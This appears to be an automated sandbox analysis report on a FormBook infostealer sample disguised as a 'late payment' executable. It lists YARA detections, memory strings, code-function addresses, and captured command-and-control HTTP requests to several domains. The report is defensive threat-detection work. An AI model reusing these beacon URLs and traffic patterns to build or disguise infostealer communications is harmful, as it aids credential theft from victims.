          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://www.everythangbutwhite.com
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://www.everythangbutwhite.com/
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://www.highvizpeople.com/10_Best_Mutual_Funds.cfm?fp=lEL3szcLRiQ3X72dJydtT9fP1DR49HnC0B3XMUp8zSX
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://www.highvizpeople.com/Accident_Lawyers.cfm?fp=lEL3szcLRiQ3X72dJydtT9fP1DR49HnC0B3XMUp8zSX%2FL
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://www.highvizpeople.com/Best_Penny_Stocks.cfm?fp=lEL3szcLRiQ3X72dJydtT9fP1DR49HnC0B3XMUp8zSX%2F
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://www.highvizpeople.com/Migraine_Pain_Relief.cfm?fp=lEL3szcLRiQ3X72dJydtT9fP1DR49HnC0B3XMUp8zSX
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://www.highvizpeople.com/__media__/design/underconstructionnotice.php?d=highvizpeople.com
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://www.highvizpeople.com/__media__/js/trademark.php?d=highvizpeople.com&type=ns
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://www.highvizpeople.com/display.cfm
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://www.highvizpeople.com/px.js?ch=1
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://www.highvizpeople.com/px.js?ch=2
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://www.highvizpeople.com/sk-logabpstatus.php?a=MzZzaVd5UDZhY0hEU3Z1UzFXVHRjNXcrTjlwaWZWbWlYbHV5Y
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://www.highvizpeople.com/song_lyrics.cfm?fp=lEL3szcLRiQ3X72dJydtT9fP1DR49HnC0B3XMUp8zSX%2FLdrtTp
          Source: unknownDNS traffic detected: queries for: www.highvizpeople.com
          Source: global trafficHTTP traffic detected: GET /u9xn/?z0=rzasM82ZF5Q0VpfmrNE4kv3GDdRAHDJpM3U8JxcA+ITN6WDsXwhhZ+Z3rxJnSB0jHUWg&PjlT=JhfHclW8zdo HTTP/1.1Host: www.highvizpeople.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /u9xn/?z0=Eyy2FmThgSczREyJUe5BPhqJIrAJD2iL3N0sS7pth5V4AuiiYZbYrcKb75E1rnMpvjAp&PjlT=JhfHclW8zdo HTTP/1.1Host: www.oddanimalsink.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /u9xn/?z0=Q2BOOCh2YmRGzHBLpF4ZGgsAfzPJKYPCPJSLTy3o+TqCnIZHYQwJa/p1Zgpwk24Ey+uX&PjlT=JhfHclW8zdo HTTP/1.1Host: www.itskosi.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /u9xn/?z0=LAjf/xx2BjlKOSx2Nw0FybGnOLdFfrA16q3xOuIsu5dbrvvju1demR4HH9h71lmoA2bo&PjlT=JhfHclW8zdo HTTP/1.1Host: www.crisisinterventionadvocates.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /u9xn/?z0=a5IGPNkliMrRjEJlFMTr6wLc8iEcWRvcvuUq3Ax8SYLvcABDJqlPe7bn0Dwhj5qYaiRJ&PjlT=JhfHclW8zdo HTTP/1.1Host: www.everythangbutwhite.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 0_2_00404FC2 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00404FC2

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 1.1.pago atrasado.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.pago atrasado.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.pago atrasado.exe.2330000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.pago atrasado.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.pago atrasado.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.pago atrasado.exe.2330000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000002.326494354.00000000008E0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.286357081.0000000006D43000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.248580224.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.326520078.0000000000910000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.514967425.0000000002B00000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.249155539.0000000002330000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.270365101.0000000006D43000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.511956241.00000000001B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.326181287.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.514678237.0000000002A00000.00000040.00020000.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 1.1.pago atrasado.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.pago atrasado.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.pago atrasado.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.pago atrasado.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.pago atrasado.exe.2330000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.pago atrasado.exe.2330000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.pago atrasado.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.pago atrasado.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.pago atrasado.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.pago atrasado.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.pago atrasado.exe.2330000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.pago atrasado.exe.2330000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.326494354.00000000008E0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.326494354.00000000008E0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000000.286357081.0000000006D43000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000000.286357081.0000000006D43000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000001.248580224.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000001.248580224.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.326520078.0000000000910000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.326520078.0000000000910000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000010.00000002.514967425.0000000002B00000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000010.00000002.514967425.0000000002B00000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.249155539.0000000002330000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.249155539.0000000002330000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000000.270365101.0000000006D43000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000000.270365101.0000000006D43000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000010.00000002.511956241.00000000001B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000010.00000002.511956241.00000000001B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.326181287.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.326181287.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000010.00000002.514678237.0000000002A00000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000010.00000002.514678237.0000000002A00000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: pago atrasado.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 1.1.pago atrasado.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.pago atrasado.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.pago atrasado.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.pago atrasado.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.pago atrasado.exe.2330000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.pago atrasado.exe.2330000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.pago atrasado.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.pago atrasado.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.pago atrasado.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.pago atrasado.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.pago atrasado.exe.2330000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.pago atrasado.exe.2330000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.326494354.00000000008E0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.326494354.00000000008E0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000000.286357081.0000000006D43000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000000.286357081.0000000006D43000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000001.248580224.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000001.248580224.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.326520078.0000000000910000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.326520078.0000000000910000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000010.00000002.514967425.0000000002B00000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000010.00000002.514967425.0000000002B00000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.249155539.0000000002330000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.249155539.0000000002330000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000000.270365101.0000000006D43000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000000.270365101.0000000006D43000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000010.00000002.511956241.00000000001B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000010.00000002.511956241.00000000001B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.326181287.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.326181287.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000010.00000002.514678237.0000000002A00000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000010.00000002.514678237.0000000002A00000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 0_2_004030FB EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_004030FB
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 0_2_004047D30_2_004047D3
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 0_2_004061D40_2_004061D4
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 0_2_100088260_2_10008826
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 0_2_10003D100_2_10003D10
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 0_2_100110D10_2_100110D1
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 0_2_1000F8F20_2_1000F8F2
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 0_2_1001199C0_2_1001199C
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 0_2_100059A10_2_100059A1
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 0_2_1001A9E50_2_1001A9E5
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 0_2_1001A9F40_2_1001A9F4
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 0_2_1000B22E0_2_1000B22E
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 0_2_1000FE640_2_1000FE64
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 0_2_10005E950_2_10005E95
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 0_2_100062AD0_2_100062AD
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 0_2_100066E20_2_100066E2
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 0_2_10006B170_2_10006B17
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 0_2_1000F3800_2_1000F380
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_004010301_2_00401030
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_0041D0F51_2_0041D0F5
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_0041C0FC1_2_0041C0FC
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_0041B8B61_2_0041B8B6
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_0041C9851_2_0041C985
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_0041C3AF1_2_0041C3AF
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00408C6B1_2_00408C6B
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00408C701_2_00408C70
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_0041BD451_2_0041BD45
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00402D901_2_00402D90
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_0041A6B61_2_0041A6B6
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00402FB01_2_00402FB0
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A920A81_2_00A920A8
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009DB0901_2_009DB090
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009F20A01_2_009F20A0
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A928EC1_2_00A928EC
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A810021_2_00A81002
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009CF9001_2_009CF900
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009E41201_2_009E4120
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A922AE1_2_00A922AE
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009FEBB01_2_009FEBB0
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A8DBD21_2_00A8DBD2
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A92B281_2_00A92B28
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009D841F1_2_009D841F
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A8D4661_2_00A8D466
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009F25811_2_009F2581
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A925DD1_2_00A925DD
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009DD5E01_2_009DD5E0
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A92D071_2_00A92D07
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009C0D201_2_009C0D20
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A91D551_2_00A91D55
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A92EF71_2_00A92EF7
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009E6E301_2_009E6E30
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A8D6161_2_00A8D616
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A91FF11_2_00A91FF1
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_1_004010301_1_00401030
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_1_0041D0F51_1_0041D0F5
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_1_0041C0FC1_1_0041C0FC
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_1_0041B8B61_1_0041B8B6
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_1_0041C9851_1_0041C985
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0454841F16_2_0454841F
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045F100216_2_045F1002
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0454B09016_2_0454B090
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045620A016_2_045620A0
